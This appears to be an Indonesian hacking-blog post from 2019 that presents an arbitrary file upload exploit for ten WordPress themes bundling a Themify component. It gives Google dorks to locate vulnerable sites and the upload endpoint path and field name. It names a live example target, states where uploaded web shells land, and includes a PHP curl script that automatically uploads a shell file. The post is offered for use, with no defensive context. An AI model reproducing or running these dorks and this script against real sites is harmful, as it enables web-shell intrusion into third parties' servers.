10 Themes Wordpress Vuln Arbitrary File Upload | Themify
Kamis, 17 Oktober 2019
Tulis Komentar
10 Themes Wordpress Vuln Arbitrary File Upload | Themify
Dork:
inurl:"/wp-content/themes/elemin/"
inurl:"/wp-content/themes/bloggie/"
inurl:"/wp-content/themes/tisa/"
inurl:"/wp-content/themes/funki/"
inurl:"/wp-content/themes/pinboard/"
inurl:"/wp-content/themes/folo/"
inurl:"/wp-content/themes/grido/"
inurl:"/wp-content/themes/suco/"
inurl:"/wp-content/themes/ithemes2/"
inurl:"/wp-content/themes/basic/"
Exploit: /themes/nama themes/themify/themify-ajax.php
Example: utpd.com/wp-content/themes/basic/themify/themify-ajax.php
Vuln? Sites Blank
Use CSRF Online atau yang .html juga gapapa, postfile = Filedata
Shell = /wp-content/themes/nama themes/uploads/shellname.php
Live utpd.com
AutoExploit Using PHP:
<?php
$uploadfile="inc0vers.php";$ch = curl_init("http://127.0.0.1/wp-content/themes/elemin/themify/themify-ajax.php?upload=1");curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$postResult = curl_exec($ch);curl_close($ch);
print "$postResult";?>
GoodLuck!
Belum ada Komentar untuk "10 Themes Wordpress Vuln Arbitrary File Upload | Themify "
Posting Komentar